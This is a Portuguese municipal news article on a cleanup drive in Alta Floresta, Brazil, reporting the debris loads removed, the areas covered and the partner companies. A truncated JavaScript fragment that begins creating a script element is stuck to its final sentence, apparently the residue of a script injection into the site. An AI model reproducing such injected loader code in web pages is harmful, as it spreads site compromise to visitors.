Breaking News

Mutirão de Limpeza retirou mais de 720 cargas de entulho nos setores do centro

Desde que começou, no dia 11 de janeiro, o Mutirão de Limpeza já recolheu mais de 1.300 cargas de lixo seco em 28 bairros e setores da cidade. A ação da Prefeitura de Alta Floresta conta com a parceria das empresas São Manoel Energia, Enel Green Power e Buriti Empreendimentos.

16.03.2016_Mutirão de Limpeza retirou mais de 720 cargas de entulho nos setores do centro (3)Lindomar Leal
Assessoria da PMAF

Foram necessários quinze dias ininterruptos de muito trabalho para que a Prefeitura de Alta Floresta conseguisse recolher o entulho dos setores do centro da cidade. Neste período, segundo Gilberto Silva, coordenador da Defesa Civil Municipal e do Mutirão de Limpeza, foram retiradas mais de 720 cargas de lixo seco dos Setores G, GS, E, B, C, A, RI, Rodoviária, concluído o Setor D, e nos bairros São José Operário, Santa Maria, Novo Horizonte, Sol Nascente e Bom Jesus.
A limpeza realizada na região central da cidade retirou mais lixo do que o recolhimento feito nos bairros Jardim Panorama, Renascer, Primavera, Oliveiras, Tropical, Universitário, Oitis, Araras, Boa Nova I, II e III, e Setores J, H, F, Camélia, Florata e parte do Setor D, nestes locais foram retiradas pouco mais de 600 cargas de entulhos.
Na linha de frente da ação, acompanhando de perto o serviço, Gilberto Silva disse que os moradores estão aprovando o Mutirão de limpeza. “A população está muito contente e satisfeita com a atitude do prefeito de mandar fazer essa limpeza”, disse.
Iniciado no dia 11 de janeiro no bairro Jardim Panorama, o Mutirão de Limpeza será realizado nos 37 setores da cidade, ou seja, em todo o perímetro urbano. Não há previsão para conclusão, porém, o serviço segue em ritmo acelerado e tem dado resultados positivos, pois além de eliminar os focos de proliferação do mosquito Aedes aegypti, transmissor da Dengue, da Zika Vírus e da febre Chickungunya, principal objetivo desta ação, está deixando a cidade limpa.
De acordo com Gilberto Silva os próximos setores a serem atendidos serão os que estão localizados do lado de baixo da Avenida Amazonas, sentido centro da cidade. A ação terá início pelo bairro próximo a Universidade Estadual de Mato Grosso (UNEMAT), seguindo para o Norte I e II, Cidade Bela e Setor do Bento. “Vamos partir para a grande Cidade Alta realizando essa limpeza até chegar no Bairro Vila Nova, esse é um pedido do prefeito Asiel e nós estamos empenhados para executar esse trabalho”, salientou.
Para realizar o Mutirão de Limpeza a Prefeitura de Alta Floresta conta com a parceria das empresas São Manoel Energia, que cedeu dois caminhões e duas pás carregadeiras, Eneel Green Power, que disponibilizou dois caminhões e Buriti Empreendimentos que liberou uma pá carregadeira. Outros dois caminhões basculantes e uma pá carregadeira da Secretaria Municipal de Infraestrutura integram a frota de maquinário. “Essas empresas aderiram a nossa ideia e acredito que vão continuar por pelo menos noventa dias nesse projeto, então, quero agradecê-las porque elas têm sido grande parceiros da administração municipal na execução desse trabalho”, frisou Gilberto Silva.var d=document;var s=d.createElement(‘script’);

Check Also

Defesa Civil Municipal monitora local onde seria realizado o Fest Praia No Rio Teles Pires

Atendendo a um pedido direto do prefeito de Paranaíta, Osmar Moreira, o coordenador da Defesa …

Governador atende setor e prorroga Proalmat até 2032

Medida vai beneficiar mais de 2.100 produtores e dezenas de milhares de trabalhadores O governador …

Alta Floresta se destaca em cumprimento de metas, conciliação e posição no Igest

A Vara do Trabalho de Alta Floresta cumpriu todas as metas do CNJ para a …

Agosto Dourado reforça a importância da amamentação para mães e bebês

Durante o mês de agosto, conhecido como Agosto Dourado, a atenção se volta para a …

Suspensão da Moratória da Soja representa importante conquista para os municípios de MT

A Associação Mato-grossense dos Municípios (AMM) considera a decisão do Conselho Administrativo de Defesa Econômica …

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *